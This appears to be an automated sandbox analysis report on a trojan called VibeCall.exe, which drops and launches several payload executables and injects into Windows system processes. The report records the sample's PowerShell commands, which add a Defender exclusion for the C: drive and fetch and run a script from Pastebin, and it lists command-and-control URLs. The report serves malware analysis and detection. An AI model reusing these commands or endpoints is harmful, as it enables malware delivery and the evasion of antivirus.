                      Source: powershell.exe, 00000002.00000002.1871620935.0000021600228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2011671405.0000026ED0DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000002.00000002.1871620935.0000021600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1871645420.00000278A34C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2011671405.0000026ED0BC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000002.00000002.1871620935.0000021600228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2011671405.0000026ED0DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: VibeCall.exe, 00000000.00000003.1793633042.0000021925C5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: powershell.exe, 0000000A.00000002.2011671405.0000026ED0DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: VibeCall.exe, 00000000.00000003.1812007554.0000021925C51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: VibeCall.exe, 00000000.00000003.1774847239.0000021925C65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: VibeCall.exe, 00000000.00000003.1774847239.0000021925C65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.coml
                      Source: VibeCall.exe, 00000000.00000003.1792975564.0000021925C5D000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1793046024.0000021925C67000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1792860863.0000021925C5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: VibeCall.exe, 00000000.00000003.1792555615.0000021925C5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comH
                      Source: VibeCall.exe, 00000000.00000003.1792515534.0000021925C89000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1792338713.0000021925C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comy/;
                      Source: fontdrvhost.exeString found in binary or memory: https://45.129.185.24:1896/22c0d31ace677b/digpu6k5.xditc
                      Source: VibeCall.exe, 00000000.00000000.1767166805.00007FF6F517D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?
                      Source: VibeCall.exe, 00000000.00000000.1767166805.00007FF6F517D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?Description:
                      Source: VibeCall.exe, 00000000.00000000.1767166805.00007FF6F517D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/app-launch-failed
                      Source: VibeCall.exe, 00000000.00000000.1767166805.00007FF6F517D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/download%s%sInstall
                      Source: VibeCall.exe, 00000000.00000000.1767166805.00007FF6F517D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/downloadCommon
                      Source: VibeCall.exe, 00000000.00000000.1767166805.00007FF6F517D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/info
                      Source: VibeCall.exe, 00000000.00000000.1767166805.00007FF6F517D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/sdk-not-found
                      Source: powershell.exe, 00000002.00000002.1871620935.0000021600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1871645420.00000278A34C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2011671405.0000026ED0BC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: fontdrvhost.exeString found in binary or memory: https://api.help-asus.com:5101/6519b3d55998bf5e49d571/9uhjmqat.jd8rm
                      Source: powershell.exe, 0000000A.00000002.2121544877.0000026EE0C34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000A.00000002.2121544877.0000026EE0C34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000A.00000002.2121544877.0000026EE0C34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: VibeCall.exe, 00000000.00000003.1776356902.0000021925C60000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1775943185.0000021925C60000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1776489725.0000021925C5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.mic
                      Source: powershell.exe, 0000000A.00000002.2011671405.0000026ED0DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000004.00000002.1871645420.00000278A461D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: powershell.exe, 00000002.00000002.1966559571.000002166E65C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
                      Source: aisolution_vibecall_a.exe, 0000000C.00000001.2189280111.000000000025D000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                      Source: powershell.exe, 00000002.00000002.1939088949.0000021610074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1938713455.00000278B3678000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1938713455.00000278B3535000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1871645420.00000278A4DA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2121544877.0000026EE0C34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: powershell.exe, 00000004.00000002.1871645420.00000278A461D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                      Source: powershell.exe, 00000004.00000002.1953659683.00000278BBC0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/h
                      Source: powershell.exe, 00000004.00000002.1870154356.00000278A197B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/ySSytGm5
                      Source: powershell.exe, 00000004.00000002.1871347093.00000278A1BF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/yssytgm5
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                      Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49739 version: TLS 1.2
                      Source: contry_solution_vibecall_e.exe, 0000000D.00000003.2523942367.0000000003AC0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_a0b1530a-6
                      Source: contry_solution_vibecall_e.exe, 0000000D.00000003.2523942367.0000000003AC0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_b8dd0047-5
                      Source: Yara matchFile source: 14.3.soundsolution_vibecall_c.exe.4530000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.3.videosolution_vibecall_b.exe.3ca0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.3.OpenWith.exe.4af0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.3.fontdrvhost.exe.56f0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.3.videosolution_vibecall_b.exe.3ca0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.fontdrvhost.exe.4e20000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.3.contry_solution_vibecall_e.exe.3ce0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.3.soundsolution_vibecall_c.exe.4530000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.3.videosolution_vibecall_b.exe.3ec0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.3.OpenWith.exe.48d0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.3.OpenWith.exe.4af0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.3.contry_solution_vibecall_e.exe.3ac0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.3.contry_solution_vibecall_e.exe.3ac0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.fontdrvhost.exe.4c00000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.3.fontdrvhost.exe.54d0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.3.contry_solution_vibecall_e.exe.3ac0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.fontdrvhost.exe.4c00000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.3.soundsolution_vibecall_c.exe.4750000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.fontdrvhost.exe.4c00000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.3.videosolution_vibecall_b.exe.3ca0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.3.soundsolution_vibecall_c.exe.4530000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000D.00000003.2523942367.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000003.2581937101.0000000004530000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.2586714106.0000000004AF0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.2693621448.0000000004C00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.2586355900.00000000048D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000003.2524137617.0000000003CE0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000003.2582157895.0000000004750000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.2687300777.0000000003CA0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.2693865853.0000000004E20000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.2687486988.0000000003EC0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.2529748727.00000000056F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.2529538619.00000000054D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: contry_solution_vibecall_e.exe PID: 4020, type: MEMORYSTR
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 30_2_000001E3C5B01CF4 NtAcceptConnectPort,CloseHandle,30_2_000001E3C5B01CF4
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 30_2_000001E3C5B015C0 NtAcceptConnectPort,30_2_000001E3C5B015C0
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 30_2_000001E3C5B01AA4 NtAcceptConnectPort,NtAcceptConnectPort,30_2_000001E3C5B01AA4
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 30_2_000001E3C5B00AC8 NtAcceptConnectPort,NtAcceptConnectPort,30_2_000001E3C5B00AC8
                      Source: C:\Windows\System32\OpenWith.exeCode function: 33_3_0000021CEEAC30C7 NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,RtlFreeHeap,RtlFreeHeap,33_3_0000021CEEAC30C7
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 39_2_00000202BB281AA4 NtAcceptConnectPort,NtAcceptConnectPort,39_2_00000202BB281AA4
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 39_2_00000202BB2815C0 NtAcceptConnectPort,39_2_00000202BB2815C0
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 39_2_00000202BB281CF4 NtAcceptConnectPort,CloseHandle,39_2_00000202BB281CF4
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 39_2_00000202BB280AC8 NtAcceptConnectPort,NtAcceptConnectPort,39_2_00000202BB280AC8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B7430E92_2_00007FFD9B7430E9
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_3_0177117013_3_01771170
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_3_0176F13B13_3_0176F13B
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_3_0177CC2513_3_0177CC25
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_3_0176C09A13_3_0176C09A
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_3_0176C3DC13_3_0176C3DC
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_3_01776F8913_3_01776F89
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_3_0177264D13_3_0177264D
                      Source: C:\Users\user\Documents\soundsolution_vibecall_c.exeCode function: 14_3_01190BC114_3_01190BC1
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeCode function: 15_3_016281D215_3_016281D2
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeCode function: 15_3_0161C23115_3_0161C231
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeCode function: 15_3_0161C40015_3_0161C400
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 30_2_000001E3C5B00C7030_2_000001E3C5B00C70
                      Source: C:\Windows\System32\OpenWith.exeCode function: 33_3_0000021CEEAC2C3C33_3_0000021CEEAC2C3C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 33_3_0000021CEEAC1BA633_3_0000021CEEAC1BA6
                      Source: C:\Windows\System32\OpenWith.exeCode function: 33_3_0000021CEEAC279C33_3_0000021CEEAC279C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 33_3_0000021CEEAC4A3833_3_0000021CEEAC4A38
                      Source: C:\Windows\System32\OpenWith.exeCode function: 33_3_0000021CEEAC5E7C33_3_0000021CEEAC5E7C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 33_3_0000021CEEAC557C33_3_0000021CEEAC557C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 33_3_0000021CEEAC58FC33_3_0000021CEEAC58FC
                      Source: C:\Windows\System32\OpenWith.exeCode function: 33_3_0000021CEEAC24F733_3_0000021CEEAC24F7
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 39_2_00000202BB280C7039_2_00000202BB280C70
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeCode function: String function: 0161CD90 appears 33 times
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: String function: 01767FB0 appears 38 times
                      Source: C:\Users\user\Documents\aisolution_vibecall_a.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7348 -s 252
                      Source: VibeCall.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                      Source: aisolution_vibecall_a.exe.0.drStatic PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
                      Source: aisolution_vibecall_a.exe.0.drStatic PE information: Resource name: ZIP type: 7-zip archive data, version 0.4
                      Source: contry_solution_vibecall_e.exe.0.drStatic PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
                      Source: contry_solution_vibecall_e.exe.0.drStatic PE information: Resource name: ZIP type: 7-zip archive data, version 0.4
                      Source: soundsolution_vibecall_c.exe.0.drStatic PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
                      Source: soundsolution_vibecall_c.exe.0.drStatic PE information: Resource name: ZIP type: 7-zip archive data, version 0.4
                      Source: videosolution_vibecall_b.exe.0.drStatic PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
                      Source: videosolution_vibecall_b.exe.0.drStatic PE information: Resource name: ZIP type: 7-zip archive data, version 0.4
                      Source: VibeCall.exe, 00000000.00000000.1767413045.00007FF6F5382000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemscordaccore.dll@ vs VibeCall.exe
                      Source: VibeCall.exe, 00000000.00000000.1767413045.00007FF6F5382000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVibeCall.dll2 vs VibeCall.exe
                      Source: classification engineClassification label: mal99.troj.spyw.evad.winEXE@39/29@5/9
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\Documents\aisolution_vibecall_a.exeJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-99e96d32-cf93-bab661-d67703b36bf3}
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3320:120:WilError_03
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-372783b-5f8a-e1640a-0a199f94217d}
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7732
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7348
                      Source: C:\Windows\SysWOW64\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1784
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\AppData\Local\Temp\d3nfawac.oy3Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\OpenWith.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\OpenWith.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\VibeCall.exe "C:\Users\user\Desktop\VibeCall.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\Documents\aisolution_vibecall_a.exe "C:\Users\user\Documents\aisolution_vibecall_a.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\Downloads\contry_solution_vibecall_e.exe "C:\Users\user\Downloads\contry_solution_vibecall_e.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\Documents\soundsolution_vibecall_c.exe "C:\Users\user\Documents\soundsolution_vibecall_c.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\Downloads\videosolution_vibecall_b.exe "C:\Users\user\Downloads\videosolution_vibecall_b.exe"
                      Source: C:\Users\user\Documents\aisolution_vibecall_a.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7348 -s 252
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 652
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 648
                      Source: C:\Users\user\Documents\soundsolution_vibecall_c.exeProcess created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe"
                      Source: C:\Users\user\Documents\soundsolution_vibecall_c.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4476 -s 580
                      Source: C:\Users\user\Documents\soundsolution_vibecall_c.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4476 -s 576
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\System32\fontdrvhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7732 -s 136
                      Source: C:\Windows\SysWOW64\OpenWith.exeProcess created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 496
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 384
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\System32\fontdrvhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1784 -s 144
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\Documents\aisolution_vibecall_a.exe "C:\Users\user\Documents\aisolution_vibecall_a.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\Downloads\contry_solution_vibecall_e.exe "C:\Users\user\Downloads\contry_solution_vibecall_e.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\Documents\soundsolution_vibecall_c.exe "C:\Users\user\Documents\soundsolution_vibecall_c.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\Downloads\videosolution_vibecall_b.exe "C:\Users\user\Downloads\videosolution_vibecall_b.exe"Jump to behavior
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                      Source: C:\Users\user\Documents\soundsolution_vibecall_c.exeProcess created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe"Jump to behavior
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\OpenWith.exeProcess created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: icu.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: amsi.dllJump to behavior
